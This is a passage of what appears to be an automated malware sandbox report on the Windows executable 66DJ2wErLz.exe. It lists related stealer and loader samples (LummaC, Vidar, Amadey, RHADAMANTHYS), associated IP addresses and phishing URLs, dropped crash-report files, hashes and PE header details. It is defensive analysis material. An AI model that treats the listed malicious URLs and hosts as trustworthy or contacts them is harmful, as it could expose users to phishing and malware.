                                                                                                                                                                                                                                                    AKAMAI-ASN1EU3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 184.51.34.61
                                                                                                                                                                                                                                                    873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                    • 23.44.201.32
                                                                                                                                                                                                                                                    1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.232.31.180
                                                                                                                                                                                                                                                    https://qrs.ly/gggdyxxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 2.16.158.106
                                                                                                                                                                                                                                                    KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                    • 23.33.40.135
                                                                                                                                                                                                                                                    dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 23.33.40.153
                                                                                                                                                                                                                                                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                    • 172.234.222.138
                                                                                                                                                                                                                                                    https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 2.16.158.75
                                                                                                                                                                                                                                                    T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 23.209.72.33
                                                                                                                                                                                                                                                    https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 104.126.36.32
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1out.bin.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    jYd7FUgGZc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    sfWmEoGJQR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    pN6iTXbhhc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    81eivTbdp6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                                    Entropy (8bit):0.9581081242967115
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:1lOdRG5fl4tWb0bcN6ju3RzuiFjZ24IO8D3:POdRG5febbcN6jgzuiFjY4IO8D3
                                                                                                                                                                                                                                                    MD5:0E7D95BB11DCF89347FD6D84423C0762
                                                                                                                                                                                                                                                    SHA1:8B9316D151FAEC68880BEF5CA60E1A732F082E9D
                                                                                                                                                                                                                                                    SHA-256:520FABF329C515E42D2B7A719B6463E71687C7896DEEC7C56A1D30CE618D11DF
                                                                                                                                                                                                                                                    SHA-512:E016BE429356AD2796B303DCBEE92275EEAEE751349ED45DF04DF30E61687C87E1F0A6A48A72B0F2B6FA0DD5FB4DD1C4E500DF14847529EB1E4AB9F472E20D62
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.2.3.7.3.7.2.0.1.7.6.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.2.3.7.3.7.8.7.3.6.4.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.9.4.1.d.c.8.-.7.e.e.2.-.4.6.9.0.-.a.7.a.6.-.e.8.3.b.3.0.a.0.b.a.c.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.7.8.5.1.8.8.a.-.c.3.9.a.-.4.7.7.f.-.b.1.b.b.-.b.6.2.e.b.b.8.4.9.5.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.6.D.J.2.w.E.r.L.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.c.8.-.0.0.0.1.-.0.0.1.5.-.b.0.3.c.-.9.b.3.5.9.a.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.2.3.d.0.3.6.7.2.e.a.5.7.0.5.1.c.f.9.8.3.1.9.0.4.8.3.6.c.2.5.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.a.8.a.d.3.d.9.2.a.5.a.5.7.f.0.7.5.d.e.4.0.c.c.3.a.6.3.9.1.d.b.a.2.7.9.e.c.1.!.6.6.D.J.2.w.E.r.L.z...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Tue Dec 17 15:42:17 2024, 0x1205a4 type
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):45172
                                                                                                                                                                                                                                                    Entropy (8bit):2.546659335506941
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:/q8Ev0XCJnwjHEYJ9JZOx1B4NXJWO3XC3oMBaNgQxeKEa+vXSpxdIa0q:KJn0kYJ9JcTB0JWO3XqaNBlukx70q
                                                                                                                                                                                                                                                    MD5:E07308A0808A702D5D18FD58D1CEC75E
                                                                                                                                                                                                                                                    SHA1:C19E3AF38D40F659C623AB05C0757CF3F5DA757D
                                                                                                                                                                                                                                                    SHA-256:3D05C09778EA0F8B1E8A755C080E9934A6EC00282651047F72DF83FC2560D569
                                                                                                                                                                                                                                                    SHA-512:96A1C25339A35D09C9224D2D5DB04A9F763E487301941751F99F21BFC89D628D068688D1CF7F6DFAFF4D90F64DA2AA28BA5124711865E9E8DD3BA71A39CF048C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:MDMP..a..... ........ag............4...............H...........<............,..........`.......8...........T...........X?...q......................................................................................................eJ......D ......GenuineIntel............T............ag.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8316
                                                                                                                                                                                                                                                    Entropy (8bit):3.6979375272958745
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJHk6B6Y2DXSU9DBgmftoUjHpD189bvrsfB8lm:R6lXJE6B6Y6SU9DBgmflAvwfBz
                                                                                                                                                                                                                                                    MD5:ADD39D5141AD2C55BF159063AD514467
                                                                                                                                                                                                                                                    SHA1:07193C46036A056B92D049146B04754669AEAE00
                                                                                                                                                                                                                                                    SHA-256:A307AF9F89FFA7E128B8E76F8BBE008F9F49D1295AC50706774B9BE32DF94805
                                                                                                                                                                                                                                                    SHA-512:99E7ADD25DF21F624E14F5EAE7D432AA9B79198484B8257D4790622DFBE7DCC54B42414295FB7A30732E6B6D26479B6D456E1FD91CA023683CDBDF7BF5999305
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.4.8.<./.P.i.
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4579
                                                                                                                                                                                                                                                    Entropy (8bit):4.473617544673223
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zs2rJg77aI9ClWpW8VYFYm8M4JO+9HucFio+q8TgvSCCcz7fd:uIjf2FI7cU7VpJOWGoSIicz7fd
                                                                                                                                                                                                                                                    MD5:AA3A0C79E05CD034CA5589FE60A795AA
                                                                                                                                                                                                                                                    SHA1:F9DED227887B8CFD3B4692430563C81B2A4DE609
                                                                                                                                                                                                                                                    SHA-256:44DC607AABF5140F27F2FB01D7008D2EDC33D8387BCF89F01078A255A31D1C3D
                                                                                                                                                                                                                                                    SHA-512:9BF49F41CE53315E5B7116105C8E2DE4780097E400D4382066B2E3D00BBEC289C76D83EF045849D7FC8200E765157B762F9A3BFEAB62CB7A0F790910383C3E7F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="635444" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                                                                    Entropy (8bit):4.468583057553844
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:ezZfpi6ceLPx9skLmb0fDZWSP3aJG8nAgeiJRMMhA2zX4WABluuNejDH5S:AZHtDZWOKnMM6bFpcj4
                                                                                                                                                                                                                                                    MD5:9C87AD90CFE1F6F78077679815DE5FB6
                                                                                                                                                                                                                                                    SHA1:9950465A45F4467D375500943DE0FF3289DDDFD9
                                                                                                                                                                                                                                                    SHA-256:4CD190A29029A70E61EDA0DBB76A0E6AC3F71B05AC1F300512397756C45C9507
                                                                                                                                                                                                                                                    SHA-512:736A3902DEC5C690EF5C656C2ED97F4304CE7358009FB970651F042230468024FBCC5F0F14D1BCE03232C52FA2F037F5A98352E1EB3DB71E01B41ECE7E8EC87E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~]B@.P..............................................................................................................................................................................................................................................................................................................................................BgTt........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):6.6886130130371235
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:66DJ2wErLz.exe
                                                                                                                                                                                                                                                    File size:368'640 bytes
                                                                                                                                                                                                                                                    MD5:2c0a5976c7d6d86506eb825c8d67a8b8
                                                                                                                                                                                                                                                    SHA1:55a8ad3d92a5a57f075de40cc3a6391dba279ec1
                                                                                                                                                                                                                                                    SHA256:580b4b31b7215eb5fff2396e350607376de72afef4b3a7e3d841e14081f5e9cb
                                                                                                                                                                                                                                                    SHA512:0b6efbdd6dca47d84d168a15c71014a4926d3215c3746e05008300680b2d784e7664c341e348061339469e32ad4036221c74ead6abe28c38616d4bf64364d113
                                                                                                                                                                                                                                                    SSDEEP:6144:Qh4EPRjisApQk6co65oisFCB6EGSToOC03y6o+nLxQTwdbG:Qh4agH6c55AF6lGStCIy6DLx4wBG
                                                                                                                                                                                                                                                    TLSH:B074D01126F29222F3FB4A387A35DAA45A3FB872AE75818F1354164F1D303B18D6E707
                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L..
                                                                                                                                                                                                                                                    Icon Hash:351a121111911009
                                                                                                                                                                                                                                                    Entrypoint:0x401877
                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                    Time Stamp:0x66249867 [Sun Apr 21 04:39:03 2024 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                    Import Hash:f9df41ae4b2e96d07a46131787a7a3b9
                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                    call 00007F3FCCFCE1DBh
                                                                                                                                                                                                                                                    jmp 00007F3FCCFCA85Dh
                                                                                                                                                                                                                                                    mov edi, edi
                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                                    sub esp, 00000328h
                                                                                                                                                                                                                                                    mov dword ptr [00446C38h], eax
                                                                                                                                                                                                                                                    mov dword ptr [00446C34h], ecx
                                                                                                                                                                                                                                                    mov dword ptr [00446C30h], edx
                                                                                                                                                                                                                                                    mov dword ptr [00446C2Ch], ebx
                                                                                                                                                                                                                                                    mov dword ptr [00446C28h], esi
                                                                                                                                                                                                                                                    mov dword ptr [00446C24h], edi
                                                                                                                                                                                                                                                    mov word ptr [00446C50h], ss
                                                                                                                                                                                                                                                    mov word ptr [00446C44h], cs
                                                                                                                                                                                                                                                    mov word ptr [00446C20h], ds
                                                                                                                                                                                                                                                    mov word ptr [00446C1Ch], es
                                                                                                                                                                                                                                                    mov word ptr [00446C18h], fs
                                                                                                                                                                                                                                                    mov word ptr [00446C14h], gs
                                                                                                                                                                                                                                                    pushfd
                                                                                                                                                                                                                                                    pop dword ptr [00446C48h]
                                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                    mov dword ptr [00446C3Ch], eax
                                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                    mov dword ptr [00446C40h], eax
                                                                                                                                                                                                                                                    lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                    mov dword ptr [00446C4Ch], eax
                                                                                                                                                                                                                                                    mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                    mov dword ptr [00446B88h], 00010001h
                                                                                                                                                                                                                                                    mov eax, dword ptr [00446C40h]
                                                                                                                                                                                                                                                    mov dword ptr [00446B3Ch], eax
                                                                                                                                                                                                                                                    mov dword ptr [00446B30h], C0000409h
                                                                                                                                                                                                                                                    mov dword ptr [00446B34h], 00000001h
                                                                                                                                                                                                                                                    mov eax, dword ptr [00444004h]
                                                                                                                                                                                                                                                    mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                    mov eax, dword ptr [00444008h]
                                                                                                                                                                                                                                                    mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                    call dword ptr [000000C8h]
                                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                    • [LNK] VS2008 build 21022
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x429fc0x3c.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4210000x10ca8.rsrc
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x410000x194.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                    .text0x10000x3f81c0x3fa00e7280c8804c83e117521bcbe76bdcd4aFalse0.8032140225933202data7.371051868429859IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .rdata0x410000x230e0x240071b286c21841defcab7ab5f1a66c9590False0.3597005208333333data5.424758200955968IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .data0x440000x3dc4bc0x70001d565e355b2a62e898b0d3b0e50f9c91unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .rsrc0x4210000x10ca80x10e00f65f5f990d8f1c2e5a8e69b5e98e1e46False0.4506221064814815data4.769886824903952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                    RT_ICON0x4215b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.5101279317697228
                                                                                                                                                                                                                                                    RT_ICON0x4224580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.5658844765342961
                                                                                                                                                                                                                                                    RT_ICON0x422d000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.6002304147465438
                                                                                                                                                                                                                                                    RT_ICON0x4233c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.6394508670520231
                                                                                                                                                                                                                                                    RT_ICON0x4239300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.4099585062240664
                                                                                                                                                                                                                                                    RT_ICON0x425ed80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4793621013133208
                                                                                                                                                                                                                                                    RT_ICON0x426f800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.47704918032786886
                                                                                                                                                                                                                                                    RT_ICON0x4279080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.5806737588652482
                                                                                                                                                                                                                                                    RT_ICON0x427de80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkmenTurkmenistan0.3406183368869936
                                                                                                                                                                                                                                                    RT_ICON0x428c900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkmenTurkmenistan0.46435018050541516
                                                                                                                                                                                                                                                    RT_ICON0x4295380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkmenTurkmenistan0.5046082949308756
                                                                                                                                                                                                                                                    RT_ICON0x429c000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkmenTurkmenistan0.523121387283237
                                                                                                                                                                                                                                                    RT_ICON0x42a1680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkmenTurkmenistan0.42479253112033194
                                                                                                                                                                                                                                                    RT_ICON0x42c7100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkmenTurkmenistan0.43550656660412757
                                                                                                                                                                                                                                                    RT_ICON0x42d7b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkmenTurkmenistan0.4360655737704918
                                                                                                                                                                                                                                                    RT_ICON0x42e1400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkmenTurkmenistan0.4512411347517731
                                                                                                                                                                                                                                                    RT_STRING0x42e7d80x386data0.4567627494456763
                                                                                                                                                                                                                                                    RT_STRING0x42eb600xb2data0.601123595505618
                                                                                                                                                                                                                                                    RT_STRING0x42ec180x6d0data0.4288990825688073
                                                                                                                                                                                                                                                    RT_STRING0x42f2e80x71edata0.4313940724478595
                                                                                                                                                                                                                                                    RT_STRING0x42fa080x6e2data0.43473325766174803
                                                                                                                                                                                                                                                    RT_STRING0x4300f00x65cdata0.43611793611793614
                                                                                                                                                                                                                                                    RT_STRING0x4307500x71adata0.4251925192519252
                                                                                                                                                                                                                                                    RT_STRING0x430e700x7c4data0.4200201207243461
                                                                                                                                                                                                                                                    RT_STRING0x4316380x66adata0.43118148599269185
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x42e5a80x76dataTurkmenTurkmenistan0.6694915254237288
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x427d700x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                                    RT_VERSION0x42e6200x1b8COM executable for DOS0.5636363636363636
                                                                                                                                                                                                                                                    DLLImport
